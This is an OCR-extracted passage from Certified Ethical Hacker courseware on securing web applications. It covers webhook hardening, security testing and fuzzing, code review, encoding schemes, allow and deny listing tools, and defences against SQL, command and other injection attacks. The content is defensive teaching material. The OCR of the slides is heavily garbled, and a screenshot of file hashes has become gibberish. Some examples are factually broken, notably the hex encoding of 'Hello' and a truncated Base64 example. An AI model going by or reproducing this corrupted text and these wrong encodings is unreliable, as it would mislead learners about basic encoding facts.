Best Practices for Securing Webhooks

a Use shared authentication secrets such as HTTP basic

authentication for all webhooks to prevent any random
malicious data
II Validate the X-OP-Timestamp w ithin a threshold from
the current time

a Implement webhook signing to verify the data received

from the ESPs and use the constant time-compare
function II Ensure that the event processing is idempotent to
prevent the replication of event receipts

II Track event_id to avoid unintentional double-processing

of the same events through replay attacks II Ensure that the webhook code responds with 200 OK
(success) instead of 4xx or Sxx statuses in case of errors

II Ensure that the firewall rejects webhook calls from

unauthorized sources other than the ESP's IP addresses m Ensure that the webhook URL supports the HTTP HEAD
method to retrieve meta-information

II Use rate limiting on webhook calls to control the

incoming and outgoing traffic m Use threaded requests to send multiple requests
simu ltaneously and to update data in the API rapidly

II Compare the X-Cld-Timestamp of the webhook with the

current timestamp to prevent timing attacks m Ensure that the tokens are stored against store_ hash
and not the user data

Copynght Cl by EC-CIUIR:11 All Rights Reserved Reproduction IS Strictly Prohibited

Best Practices for Securing Webhooks

Various best practices for securing webhooks are as follows :
• Use HTTPS instead of HTTP to safeguard data from exposure while in transit.
• Use shared authentication secrets such as HTTP basic authentication for all webhooks to
prevent any random malicious data.

• Implement webhook signing to verify the data received from the email service providers
(ESPs) and use the constant time-compare function.
• Track event_id to avoid unintentional double-processing of the same events through
replay attacks.

• Ensure that the firewall rejects webhook calls from unauthorized sources other than the
ESP's IP addresses.
• Use rate limiting on webhook calls in the web server to control the incoming and
outgoing traffic.
• Compare the request timestamp X-Cld-Timestamp of the webhook with the current
timestamp to prevent timing attacks.
• Validate the X-OP-Timestamp within a threshold from the current time.
• Ensure that the event processing is idempotent to prevent the replication of event
receipts.
• Ensure that the webhook code responds with 200 OK (success) instead of 4xx or Sxx
statuses in case of errors to ensure that the webhooks are not deactivated.

Module 14 Page 2140 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved . Reproduction is Strictly Prohibited .
Ethical Hacking and Co untermeasures Exam 312-50 Certified Et hical Hacker
Hacking Web Applications

■ Ensure that the webhook URL supports the HTTP HEAD method to retrieve meta-
information without transferring the entire content.
■ Use threaded requests to send multiple requests simultaneously and to update data in
the API rapidly.
■ Ensure that the tokens are stored against store_hash and not the user data.
■ Verify clients through the implementation of mutual TLS.
■ Do not send confidential information using webhooks; instead, use authorized APls.
■ Use HMAC-based signatures to perform message verification and avoid payload
exploitation.
■ Use a unique event ID to record every webhook payload within the database.
■ Log each of the sent web hooks for debugging when required.

Module 14 Page 2141 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Right s Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Co untermeasures Exam 312-50 Cert ified Et hical Hacker
Hacking Web Applications

LO#05: Summarize the Techniques used in Web Application Security

, r Copyright C) by IC--CDUICII All Rights Reserved Reproduction ISStrictly Prohibited

Web Application Security

After learning the hacking methodologies adopted by attackers of web applications and the
tools they use, it is important to learn how to secure these applications from such attacks. A
careful analysis of security will help you, as an ethical hacker, to secure your applications. To do
so, one should design, develop, and configure web applications using the countermeasures and
techniques discussed in this section.

Module 14 Page 2142 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Right s Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

Web Application Security Testing

8 It involves testing a web application using manually designed data, customized code, and some browser extension
ManualWeb App t ools to detect vulnerabilities and weaknesses associated with the appli cations
Security Testing
e Security professi onals use tools such as SecApps, Selenium, and Apache JMeter t o perform manual testing

8 It is a technique employed for automating the testing process. These testi ng methods and procedures are
Automated Web incorporated i nto each stage of development t o report feedback constantly
App Security
Testing 8 Security professionals use tools such as Ranorex studio, TestCom plete, and Leapworkto perform automated
t esting

Static Application 8 It is also referred to as a white-box testing approach, in which t he complete system architecture (including its
Security Testing source code) or application/software to be tested is already known to the tester
(SAST) 8 Security professionals use tools such as Codacy, Appknox, and Attack Fl ow to perform SAST

Dynamic 8 It is also known as a black-box testing approach and is performed directly on running code to identify issues related
Application to interfaces, requests/responses, sess ions, scripts, authentication processes, code injections, etc.
Security Testing
(DAST) 8 Security professionals use tools such as lnvicti, Acun etix vulnerability Scanner, and HCL AppScan to perform DAST

Copynght Cl by EC-C1unc1I All Rights Reserved Reproduction is Stnctly Proh1b1ted

Web Application Security Testing

Web application security testing is a process of conducting security assessment and
performance analysis of an application and generating timely reports on its security levels and
threat exposures. It is often conducted by security professionals and programmers to test and
strengthen the security of an application using the following techniques:
• Manual Web Application Security Testing

Manual security testing involves testing a web application using manually designed data,
customized code, and some browser extension tools such as SecApps to detect
vulnerabilities and weaknesses associated with the applications. It mainly focuses on
business logic errors and threat analysis. Security professionals also use other tools such
as Selenium, JMeter, Loadrunner, QTP, Bugzilla, and Test Link to perform manual
testing.
■ Automated Web Application Security Testing

It is a technique employed for automating the testing process. Automated testing tools
can be used for the rapid discovery of vulnerabilities in a systematic manner so that they
can be patched easily. These testing methods and procedures are incorporated into
each development stage to report feedback constantly. Changes in every piece of code
can be analyzed and developers are instantly notified if any vulnerabilities are detected.
Security professionals use tools such as Ranorex studio, TestComplete, Leapwork,
Kata Ion Studio, and Test sigma to carry out automat ed testing.
■ Static Application Security Testing (SAST)

Static application testing is also referred to as a whitebox testing, in which the complete
system architecture (including its source code) or application/software to be tested is

Module 14 Page 2143 Ethical Hacking and Counte rmeasures Copyright © by EC-Council
A ll Rig hts Reserved . Reproduction is Strictly Prohibited .
Ethical Hacking and Co untermeasures Exam 312-50 Certified Et hical Hacker
Hacking Web Applications

already known to the tester. SAST tools assist developers in testing the source code to
discover and report design flaws associated with the application, which can open doors
for various attacks. It also ensures that the source code is compliant with defined rules,
standards, and guidelines. Security professionals use tools such as Codacy, Appknox,
AttackFlow, bugScout, and PT Application Inspector, to perform SAST.
• Dynamic Application Security Testing (DAST)

Unlike SAST, DAST is known as a blackbox testing, in which the system architecture or
application to be tested is not known to the testers. DAST tools execute on running code
to identify issues related to interfaces, requests/responses, sessions, scripts,
authentication processes, code injections, etc. They allow testers to discover underlying
vulnerabilities or flaws in web applications. DAST tools also use fuzzing, which refers to
throwing unexpected and unvalidated test cases at a web page. Security professionals
use tools such as lnvicti, Acunetix Vulnerability Scanner, HCL AppScan, Micro Focus
Fortify on Demand, and Appknox, to perform DAST.

Module 14 Page 2144 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

Web Application Fuzz Testing

Web application fuzz testing (fuzzing) is a black-box testing method. It is a quality checking and assurance technique used to
identify coding errors and security loopholes in we b applications

Huge amounts of random data called 'Fuzz' w ill be generated by the f uzz testing tools (Fuzzers) and used aga inst the target
web application to discover vulnerabilities that can be exploited by various attacks

Employ this fuzz testing t echnique to test the robustness and immunity of the developed web application against attacks like
buffe r overflow, DOS, XSS, and SQL injection

Fuzz Testing Scenario

t
:,~.: :~~pplicationName') do
@host= " localhostu
@port= 80 ··········>: Fuzz Program ·· ······ ··► HTTP Client

d
____ _,

Logs

Copynght Cl by EC-C1unc1I All Rights Reserved Reproduction is Stnctly Proh1b1ted

Web Application Fuzz Testing

Web application fuzz testing (fuzzing) is a blackbox testing method. It is a quality checking and
assurance technique used to identify coding errors and security loopholes in web applications.
Massive amounts of random data called "fuzz" are generated by fuzz testing tools (fuzzers) and
used against the target web application to discover vulnerabilities that can be exploited by
various attacks. Attackers employ various attack techniques to crash the victim's web
applications and cause havoc in the least possible time. Security personnel and web developers
employ this fuzz testing technique to test the robustness and immunity of the developed web
application against attacks such as buffer overflow, DOS, XSS, and SQL injection.
Steps of Fuzz Testing

Web application fuzz testing involves the following steps:

■ Identify the target system
■ Identify inputs
■ Generate fuzzed data
■ Execute the test using fuzz data
■ Monitor system behavior
■ Log defects
Fuzz Testing Strategies

■ Mutation-Based: In this type of t esting, the current data samples create new test data,
and the new test data will again mutate to generate further random data. This type of
testing starts with a valid sample and keeps mutating until the target is reached.

Module 14 Page 2145 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved . Reproduction is Strictly Prohibited .
Ethical Hacking and Co untermeasures Exam 312-50 Certified Et hical Hacker
Hacking Web Applications

■ Generation-Based: In this type of testing, the new data will be generated from scratch,
and the amount of data to be generated is predefined based on the testing model
■ Protocol-Based: In this type of testing, the protocol fuzzer sends forged packets to the
target application that is to be tested. This type of testing requires detailed knowledge
of the protocol format being tested . It involves writing a list of specifications into the
fuzzer tool and then performing the model-based test generation technique to go
through all the listed specifications and add the irregularities in the data contents,
sequence, etc.
Fuzz Testing Scenario
The diagram below shows an overview of the main components of the fuzzer. An attacker script
is fed to the fuzzer, which in turn translates the attacks to the target as http requests. These
http requests will get responses from the target and all the requests and their responses are
then logged for manual inspection.

Attack Script:
Setup('We bAppllcatlonName') do
@host • • 1ocalhost"'

@po-rt •_so_ _ _ _j" · ···►.__Fu_z_z_Pr-o-gr_a_m_,•·········3>- HTTP Client

<·············
... Response
end

Logs

Figure 14.102: Web application fuzz testing scenario

Fuzz Testing Tools:

■ WSFuzzer (https://owasp.org)
■ WebScarab (https://owasp.org)
■ Burp Suite (https://portswigger.net)
■ HCL AppScan ®Standard (https://www.hcltechsw.com)
■ Peach Fuzzer (https://www.peach. tech)

Module 14 Page 2146 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

Source Code Review

Source code reviews are used to detect bugs and irregularities in developed web applications
It can be performed manually or by automated tools to identify specific areas in the application code that handle functions
regarding authentication, session management, and data validation
It can identify vulnerabilities to non-validated data as well as poor coding techniques of developers that allow attackers to
exploit the web applications

Manual Code Review Automated Code Review

Push Code

Develop

e
/
If OK, Deploy
0
Run Code
0
~
Review

Feedback -
Code
Review
0
\ ~ OK, Build Notify Modify
Err ors
) ft
~

~
Copynght Cl by EC-C1unc1I All Rights Reserved Reproduction is Stnctly Proh1b1ted

Source Code Review

Source code reviews are used to detect bugs and irregularities in the developed web
applications. They can be performed manually or using automated tools to identify specific
areas in the application code to handle functions regarding authentication, session
management, and data validation. They can identify un-validated data vulnerabilities and poor
coding techniques of developers that allow attackers to exploit the web applications.

Manual Code Review Automated Code Review

Push Code

Develop

e
/
If OK, Deploy
0
Run Code
Review G

Feedback
Code \ ) A
Review
0 If OK, Build
Notify Modify
Errors V
~
Figure 14.103: Manual and automated source code review

Module 14 Page 2147 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

Encoding Schemes

Web applications employ different encoding schemes for their data to safely handle unusual characters and
binary data in the way you intend

Types of Encoding Schemes

URL encoding is the process of converting URL into valid ASCII format so that data ca n be safely transported over HTTP
URL encoding replaces unusual ASCII characters with "%" followed by t he character's two-digit ASCII code expressed in
URL hexadecimal such as
Encoding 8 %3d
8 %0a New line
8 %20 space

An HTML encoding scheme is used to represent unusual characters so that they can be safely combined within
an HTML document

HTML It defines severa l HTML entities to represent usua l chara cters such as
Encoding 8 &amp; &
8 &It; <
8 &gt; >

Copynght Cl by EC-C1unc1I All Rights Reserved Reproduction is Stnctly Proh1b1ted

Encoding Schemes (Cont'd)

Unicode Encoding Base64 Encoding Hex Encoding

16-hit Unicode Encoding
e It replaces unusual Unicode
cha racters with "%u" followed by
the character's Unicode code point
expressed in hexadecima l
e %u2215
UTF-8
e It is a variable-length encoding
st andard that uses each byte
expressed in hexadecimal and
preceded by the % prefix
e %c2%a9 ©
e %e2%89%a0
e The Base64 encodi ng scheme e The HTML encodi ng scheme uses the
represents any binary data usi ng only hex val ue of every character to
printable ASCII characters represent a collection of charact ers
for transmitting binary data
e Usually, it is used for encoding email
attachment s for safe transmission
e Example:
over SMTP, but it is also used for
encodi ng user credentials Hello A125C458D8
e Example:
Jason 123B684AD9
Binary encodi ng of "cake" =
01100011011000010110101101100101
Base64 encoding: 011000 110110
000101101011 011001 010000 000000
000000

COpynght Cl by EC-C1uncil All Rights Reserve d Reproduction IS Strictly Prohibited

Encoding Schemes
Encoding is the process of converting source information into its equivalent symbolic form,
which helps in hiding the meaning of the data. At the receiving end, the encoded data is
decoded into the plaintext format. Decoding is the reverse process of encoding. Web
applications employ different encoding schemes for their data to safely handle unusual
characters and binary data in the intended manner.

Module 14 Page 2148 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved . Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

Types of Encoding Schemes

• URL Encoding
Web browsers/web servers permit URLs to contain only printable characters of ASCII
code that can be understood by them for addressing. URL encoding is the process of
converting a URL into a valid ASCII format so that data can be safely transported over
HTTP. Several characters in this range have special meanings when they are mentioned
in the URL scheme or HTTP protocol. Thus, these characters are restricted. URL encoding
replaces unusual ASCII characters with "%" followed by the character's two-digit ASCII
code expressed in the hexadecimal format, such as:
o %3d =
o %0a New line
0 %20 space

• HTML Encoding
An HTML encoding scheme is used to represent unusual characters so that they can be
safely combined within an HTML document. HTML encoding replaces unusual characters
with strings that can be recognized while the various characters define the structure of
the document. If you want to use the same characters as those contained in the
document, you might encounter problems. These problems can be overcome using
HTML encoding. It defines several HTML entities to represent particularly usual
characters such as:
o &amp; &

o &lt; <
0 &gt; >
■ Unicode Encoding
Unicode encoding is of two types: 16-bit Unicode encoding and UTF-8.
o 16-bit Unicode Encoding
It replaces unusual Unicode characters with "%u" followed by the character's
Unicode codepoint expressed in the hexadecimal format.

• %u221s /

o UTF-8
It is a variable-length encoding standard that expresses each byte in the hexadecimal
format and prefixes it with%.

• %c2 %a9 ©

• %e2%89 %a0

Module 14 Page 2149 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Co untermeasures Exam 312-50 Certified Et hical Hacker
Hacking Web Applications

■ Base64 Encoding
The Base64 encoding scheme represents any binary data using only printable ASCII
characters. In general, it is used for encoding email attachments for safe transmission
over SMTP and also for encoding user credentials.
For example:
cake= 01100011011000010110101101100101
Base64 Encoding: 011000 110110 000101 101011 011001 010000
000000 000000
■ Hex Encoding
The HTML encoding scheme uses the hex value of every character to represent a
collection of characters for transmitting binary data.
For, example:
Hello A125C458D8

Jason 123B684AD9

Module 14 Page 2150 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Right s Reserved. Reproduction is Strictly Prohibit ed.
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

Whitelisting vs. Blacklisting Applications

Application Whitelisting Application Blacklisting

Application whitelisting contains a list of Application blacklisting contains a list of

application components such as software
libraries, plugins, extensions, and configuration
files, which can be permitted to execute in the
system
It helps in preventing the unauthorized
execution and spreading of malicious programs
Whitelisting avoids the installation of
unapproved orvulnerable applications
Whitelisting provides greater flexibility by
providing protection against ransomware or
malware attacks
malicious applications or software that are
not permitted to be executed in the system
or the network
It helps in blocking malicious applications
that can cause potential damage or attack
Blacklisting is a threat-centric method as it
cannot detect modern threats and results in
attacks that lead to data loss
It is important to regularly update the backlist
for protection against latest malware attacks

Copynght Cl by EC-C1unc1I All Rights Reserved Reproduction is Stnctly Proh1b1ted

Whitelisting vs. Blacklisting Applications

Web applications have played an important role in the adoption of digital transformation
globally. Such rapid development has motivated attackers to compromise system security using
different techniques that exploit the flaws and breaches present in the applications. To thwart
these attacks, security professionals need to implement various security policies and testing
strategies.
Whitelisting and blacklisting is one such security strategy that can retain the applications,
networks, and infrastructures securely. Using this strategy, one can create a list of entities that
should be allowed and those that should be blocked. Thus, any malicious software can be
effectively blocked before it enters the organizational network.
■ Application Whitelisting

Application whitelisting specifies a list of applications components such as software

libraries, plugins, extensions, and configuration files, or legitimate software that can be
permitted to execute in the system. It helps in preventing unauthorized execution and
spreading of malicious programs. It can also prevent the installation of unapproved or
vulnerable applications. Whitelisting provides greater flexibility by providing protection
against ransomware and other types of malware attacks on web applications.
■ Application Blacklisting

Application blacklisting specifies malicious applications or software that are not

permitted to be executed in the system or the network. Blacklisting can be performed
by blocking malicious applications that can cause potential damage or lead to attacks.
Blacklisting is a threat-centric method; it cannot detect modern threats and results in
attacks leading to data loss. Hence, it is important to update the backlist regularly to

Module 14 Page 2151 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Co untermeasures Exam 312-50 Certified Et hical Hacker
Hacking Web Applications

defend against the latest malware attacks. Application blacklisting can be performed by
adding the names of applications to be blocked at the firewall level or installing specific
software to block the applications.
■ Blacklisting and whitelisting for basic URL management

URL blacklisting prevents the user from loading web pages from the blacklisted URLs.
The user can access all URLs except those in the blacklist. URL whitelisting permits the
users to access only specific URLs as exclusions to those that are added to the URL
blacklist.
URL whitelisting is performed using the following methods:
o Allow access to all URLs except the blocked ones: Whitelisting can allow the users
to access the rest of the network applications
o Block access to all URLs except permitted ones: Whitelisting can permit access to a
limited list of URLs
o Define exceptions to very restrictive blacklists: Whitelisting lets users access
schemes, subdomains of other domains, specific paths, or ports
o Allow the browser to open applications: Whitelisting is performed only for specific
external protocol handlers so that the browser can automatically execute
applications
URL blacklisting is performed using the following methods:
o Allow access to all URLs except the blocked ones: Blacklisting prevents users from
accessing blocked websites
o Block access to all URLs except permitted ones: Blacklisting blocks access to all
malicious URLs
o Define exceptions to very restrictive blacklists: Blacklisting restricts access to all
URLs that are vulnerable to attacks
o Allow the browser to open apps: Blacklisting prevents the browser from
automatically executing applications

Module 14 Page 2152 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

Application Whitelisting and Blacklisting Tools

ManageEngine
Application
Control Plus
ManageEngine Application Co ntrol Plus automates the
placement of applications in whitelists and blacklists based
on specified control rules
g~
~ g ShadowNet
https://ri:skonof>ttks.com
_J
_,
ApplluUonCOntrotPlus
Cisco Umbrella
https://umbrella.clsco.com

_., flo.. Centrify Server Suite

https://www.centrify.com

I
----· raJ APT Groups and Operations
https://doa.google.com

--
Application Whitelisting and Blacklisting Tools
https://www.monogeengine.com • NordVPN
https://nordvpn.com

l
Copynght Cl by EC-C1unc1I All Rights Reserved Reproduction is Stnctly Proh1b1ted

Various tools that help security professionals in application whitelisting and blacklisting are
discussed below.
• ManageEngine Application Control Plus

Source: https://www.manageengine.com
ManageEngine Application Control Plus automates the placement of applications in
whitelists and blacklists based on specified control rules. With its built-in, sophisticated
Endpoint Privilege Management feature, Application Control Plus enables organizations
to establish the principle of least privilege (PoLP) and zero trust by allowing only
authorized access to applications and their related privileges.

Module 14 Page 2153 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Co untermeasures Exam 312-50 Certified Et hical Hacker
Hacking Web Applications

/riu~Engine
'""I
Application Cont rol Plus ■•@MOM l~ BuildVe~ion,t0.0-503 O

Home Apphtd1t101 Group-; Polley Deployment Privilege Management Systems Repo,ts Admm Support &

Apphut oon Group N;,me Add Descripti011

FileH"'° 'IF FIiters

~lectl!d(O)

I
dugentupgrMler.exe !lA9BE1086821 Df12C 1A9AS<IA40889 :llA1!21DBfC6CB0176E74'fFS-4FH AppleMobileOevicePro_ 18680'>[ £ f F 111 50641C().49AOf 9COCO 7(40( 78B5 OC 40A6882f 84 ~ nAJ1s

AA93704089 ... SF 38 f152889A61881f84302ED62ESFE E<187238ECF10 minuy.exe DA 0:.:◄AA6716F330 90".616A08682E644l4C◄ l20,AC13-489Jf6119 3A! S290

IAStorkoril;tunch.exe ltf781 ':i71AOCFt''1 ';A A 3[0SO:JA7Zf180F874S6AfS EffCCAF;!6A4072 16[<1 skypebackgroundhost.e_ A9 465C F71SMDSC8f924F6DF 80C9696AC 7F f A045878SArDBFNJ8 70F60ABE

ie lowutil.t )(t JC94<13f 370F88C )0 H 3'1A970338A 1lee! \ 1E082AO U 90A lf C6DE 4ACA IA!'l79 l 2 7 winstore.app.e)<e 91 .EDF1JSFM7D28ED81A4981Ctot061D<IS60 98001:16FO )88 309 7f3JC

1,kype;ipp.exe 4AUCFS-4:l-OI r'91, JS14680..:!8888f' 9S881C.)4f>C D2CE0903[0832CA ~FOZ3C yourphone .exe mOA8DOFf23.AFOFWBA4C4El9807'-fSS.4CE0,65707C 170 BE )743CA~

RunAsAdmin.exe 7547[ 1f'JD"68424805C J144651?2J21BO 39t,C4836AA038J8A2A4":2 45SF3t2A verifytr unedfiles.exe >D 787f 2622ABAOS022fE'3437C4£ C9ACf 9 52SB36A8320[0 l292DA

dcngiox.e,o;e 3[44E65f3 960AOC811)8t761C 050'4 D944E1 BOA( )59CFSfA£?06l D ~81L postgres.eite 3A1489<188 6Z1896087 'i'8102H8AFOA91 480 f08A8C 19A EJBA6088

[ l844H7 1Al 6304!8~f87E 09HB009AC30 181041 CMff3409B57'U,4, winpty-agent.exe l4l 7f750ACS71ES7hB6l 1880ElfJOE.>fAll3HE94MZ C8B653tf8DC47f48A

psql .~e F 4BH.794B83S/C 07 2AD8626 989D742481AB' 1CE SF132f 990C4AB145E metroapps.ei,;e O 6CF6CA29EDA A S6f2A8002045E. 3D4F1 96FOF3-4394A0ACF008AS589

D8SA678D8458A.4DB09S637f:>FO} JCB40A390fFF 72034f030f[S8AF4AF663F4 dcwinuti l.exe ,,..4£D£48FFC 40BF08f'5£FKf70£C£1 Jf 40f9F6914-4C9001 £S057FBDD1 A0731

lm uncel

Figure 14.104: Screenshot of ManageEngine Application Control Plus

Some additional application whitelisting and blacklisting tools are as follows:

■ ShadowNet (https://riskanalytics.com)
■ Cisco Umbrella (https://umbrella.cisco.com)

■ Centrify Server Suite (https://www.centrify.com)

■ APT Groups and Operations (https://docs.google.com)

■ NordVPN (https://nordvpn.com)

Module 14 Page 2154 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Right s Reserved. Reproduction is Strictly Prohibit ed.
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

How to Defend Against Injection Attacks

SQL Injection Attacks Command Injection Flaws

8 Limit t he length of user input 8 Perform input validation
8 Use custom error messages 8 Escape dangerous characters

8 Monitor DB traffic using an IDS and a WAF
8 Disable commands such as xp_cmdshell
8 Isolate the database server and web server
8 Use language-specific libraries that avoid problems due to
shell commands
8 Perform input and output encoding
tl Use a safe API that entirely avoids the use of the interpret er

LDAP Injection Attacks File Injection Attacks

tl Perform type, pattern, and domain value validation on al l tl Strongly validate user input
input data tl Consider impl ementing a ch root jail
8 Make the LDAP filter as specific as poss ible
tl PHP: Disa ble allow_url_fopen and allow_url_i nclude in php.ini
tl Validate and restrict the amount of data returned to the user
tl PHP: Disa ble regist er_g lobals and use E_STRICTtofind
8 Implement tight access control on the data in the LDAP uninitialized variabl es
directory
8 PHP: Ensure that all file and stream functions (stream_*) are
tl Use LDAPS (LDAP over SSL) to secure communication on the
carefully vetted
web server

Copynght Cl by EC-C1unc1I All Rights Reserved Reproduction is Stnctly Proh1b1ted

How to Defend Against Injection Attacks (Cont'd)

Server-Side JS Injection Server-Side Include Injection

tl Ensure that user inputs are strictly va lidated on the 8 Validate user input and ensu re it does not include SSI
server side directives
tl Avoid using the eval() function to parse the user input 8 Apply HTML encoding to the user input before execution

tl Never use multiple commands that have identical effects tl Ensure directives are confined only to the web pages where
they are requi red
8 Use JSON.parse() instead of eva l() to parse JSON input
tl Avoi d using pages with f ilename extensions such as .stm,
8 Include "use strict" at the beginning of each function .shtm and .shtml

Server-Side Template Injection Log Injection

tl Do not creat e templates from use r inputs tl Pass log codes instead of messages through pa rameters
8 Use a simple template engine such as Must ac he or a Python 8 Use correct error codes and easily recognizable error
t emplate messages
8 Execute the t emplate inside a sand boxed environment tl Avoi d using API ca lls to log actions due to their visibility in
tl Consider loading stati c t emplate fil es w herever poss ible browser network ca lls

tl Ensure that dynamic data are passed to a templat e using the tl Pass user ids or publicly non-identifiable inputs as the
template engine's built-in functionality parameters at logging endpoints

COpynght Cl by EC-C1uncil All Rights Reserve d Reproduction IS Strictly Prohibited

Module 14 Page 2155 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved . Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

How to Defend Against Injection Attacks (Cont'd)

[ HTML Injection J [ CRLF Injection J [ XSSAttacks

e Val idate all the user inputs to remove
the HTML-syntax substrings from
user-suppl ied text
e Check the inputs for unwanted script
or HTML code such as
<scriptx/script>, <htmlx /html>
e Ensure that user outputs are al so
encoded, examined, and val idated
along with user inputs
e Enabl e the HttpOnly flag on the
server side to ensure that all the
cookies generated by the application
are not available to the client user
e Use any function to encode CRLF
special characters and avoid using the
user in put in the response headers
e Update the version of t he
programm ing language that disal lows
t he injection of CR and LF characte rs
e Check and remove any newl ine stri ngs
in the content before passing itto the
HTTP header
e Encrypt the data that is passed to the
HTTP headers t o hide the CR and LF
codes
e Configure XSSUrtFilter in the web
application to prevent CRLF injection
attacks
Copynght Cl by EC-C1uncll All Rights Reserved Reproduction is Stnctly Proh1b1ted
JI
e Validat e al l headers, cookies, query
strings, form fields, and hidden fields
(i.e., all parameters) against a rigorous
specification
e Use testingtools extensively during the
design phase to el iminate such XSS
holes in the appli cation before it goes
into use
e Use a web applicat ion firewall to block
the execution of malicious scripts
e Convert all non- alphanumeric
characters to HTML character entities
before displaying the user input in
search engines and forums
e Encode input and output and filte r
metacharacters in the input

How to Defend Against Injection Attacks

■ SQL Injection Attacks
o Limit the length of user input.
o Use custom error messages.
o Monitor DB traffic using an IDS and a WAF.
o Disable commands such as xp_ cmdshell.
o Isolate the database server and web server.
o Always use a method attribute set for POST and a low-privileged account for DB
connections.
o Run a database service account with minimal rights.
o Move extended stored procedures to an isolated server.
o Use typesafe variables or functions such as isNumeric () to ensure typesafety.
o Validate and sanitize user inputs passed to the database.
o Avoid using dynamic SQL or constructing queries with user input.
o Use prepared statements, parameterized queries, or stored procedures to access
the database.
o Display the mi nimum required information and use the "RemoteOnly" custom Errors
mode to display verbose error messages on the local machine.

Module 14 Page 2156 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

o Perform proper escaping and character filtering to avoid special string characters
and symbols such as single quotes (').
o Always set the white list logically instead of the blacklist to avoid bad code.
o Use object-relational mapping (ORM) frameworks to make the conversion of SQL
result sets into code objects more consistent.
o Use vulnerability scanners to identify possible entry points.
o Avoid using shared databases and the same account for multiple databases.
o Insist that the individuals involved in application development consider all the risks
associated with SQL injection.
o Always use the latest versions of programming languages and technologies for
development.
o Regularly update and patch applications and database servers.
o Harden OSes and applications by following the guidelines issued by vendors.
o Disable unnecessary functionalities of the database.
o Audit databases, logs, privileges, and binding terms regularly.
o Scan applications with a dynamic web vulnerability scanner to prevent code
injection.
o Enumerate the authorized values within a conditional statement.
■ Command Injection Flaws

The simplest way to defend against command injection flaws is to avoid them wherever
possible . Some language-specific libraries perform identical functions for many shell
commands and some system calls. These libraries do not contain the operating system
shell interpreter and hence ignore maximum shell command problems. For those calls
that must still be used, such as calls to backend databases, one must carefully validate
the data to ensure that it does not contain malicious content. One can also arrange
various requests in a pattern, which ensures that all the given parameters are treated as
data instead of potentially executable content.
Most systems call and use stored procedures with parameters that accept valid input
strings to access a database or prepared statements to provide significant protection,
ensuring that the supplied input is treated as data, which reduces but does not
completely eliminate the risk involved in these external calls. One can always authorize
the input to ensure the protection of the application in question. For this reason, it is
important to use the least-privileged accounts to access a database to minimize the
attack possibility.
Another robust measure against command injection is to run web applications with the
privileges required to carry out their functions. Therefore, one should avoid running the
web server as a root or accessing a database as a DBADMIN; otherwise, an attacker may

Module 14 Page 2157 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

be able to misuse administrative rights. The use of Java sandbox in the J2EE
environment stops the execution of system commands. External commands are used to
check the user information when he/she provides it. Create a mechanism for handling
all possible errors, timeouts, or blockages during the calls. Check all the output, return,
and error codes from the call to ensure that it performs as expected. Doing so allows
users to determine whether something has gone wrong. Otherwise, an attack might
occur and never be detected.
Some countermeasures against command injection flaws are as follows:
o Perform input validation.
o Escape dangerous characters.
o Use language-specific libraries that avoid problems due to shell commands.
o Perform input and output encoding.
o Use a safe API that avoids use of the interpreter entirely.
o Structure requests so that all supplied parameters are treated as data rather than
potentially executable content.
o Use parameterized SQL queries.
o Use modular shell disassociation from the kernel.
o Use built-in library functions and avoid calling OS commands directly.
o Implement the least privileges to restrict the permissions to execute the OS
commands.
o Avoid executing commands such as exec or system without proper validation and
sanitization .
o Prevent the shell interpreter using pcntl_fork and pcntl_exec within the PHP.
o Implement Python as a web framework instead of PHP for application development.
o Scan the applications with a dynamic web vulnerability scanner to prevent code
injection.
o Enumerate the authorized values within a conditional statement.
■ LDAP Injection Attacks
An LDAP injection attack is similar to an SQL injection: attacks on web applications co-
